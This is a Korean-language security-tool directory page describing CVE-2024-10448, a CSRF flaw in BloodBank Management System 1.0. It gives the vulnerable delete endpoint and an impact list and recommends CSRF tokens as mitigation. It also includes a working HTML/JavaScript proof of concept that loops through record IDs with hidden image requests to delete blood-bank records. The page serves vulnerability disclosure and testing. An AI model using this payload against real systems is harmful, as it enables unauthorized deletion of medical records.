Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10448 — 혈액 은행 CSRF 공격 POC | Kitploit
도구/GitHubGitHub/bevennyamande/cve-2024-10448
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

혈액 은행 CSRF 공격 POC

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

영향받는 버전:

  • BloodBank Management System: 1.0

취약점 정보:

  • 취약점 유형: 사이트 간 요청 위조 (CSRF)
  • 심각도: 높음
  • 상태: 패치되지 않음

취약한 엔드포인트:

  • 경로: /file/delete.php?bid=

취약점 설명:

BloodBank Management System의 혈액 요청 기능에서 사이트 간 요청 위조(CSRF) 취약점이 발견되었습니다. 이 결함은 이 경로 /file/delete.php?bid=로 delete 요청을 보낼 때 발생하며, bid 매개변수를 통해 애플리케이션에서 삭제할 레코드를 선택할 수 있습니다. 그러나 는 혈액 샘플 추가에 따라 동적으로 변하므로 요청을 성공시키기 위해 루프 내에서 자바스크립트로 생성된 이미지 태그를 사용했습니다.

bid

성공적으로 악용될 경우 피해자를 대신하여 승인되지 않은 작업(예: 데이터 삭제) 이 발생할 수 있습니다. 또한 페이로드가 포함된 악성 웹사이트를 방문함으로써 악용될 수 있습니다.


개념 증명(PoC):

다음은 bid 매개변수를 통해 사용 가능한 혈액 샘플을 삭제하는 CSRF PoC 공격 예시입니다. 공격자 제어 도메인(제 경우 localhost 사용)에 파일을 호스팅합니다:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


동영상 PoC

  • video link

영향:

  • 데이터 조작: 공격자가 사용자에게 표시되는 콘텐츠를 수정할 수 있습니다.
  • 평판 손상: 악의적인 행동으로 인해 사용자가 시스템에 대한 신뢰를 잃을 수 있습니다.

완화 권장 사항:

  1. CSRF 토큰 사용 교차 도메인 접근을 차단하는 메커니즘을 구현하거나 요청에 csrf 토큰을 포함시키고, 상태 변경 작업을 GET 요청으로 수행하지 않도록 하십시오.
도구 다운로드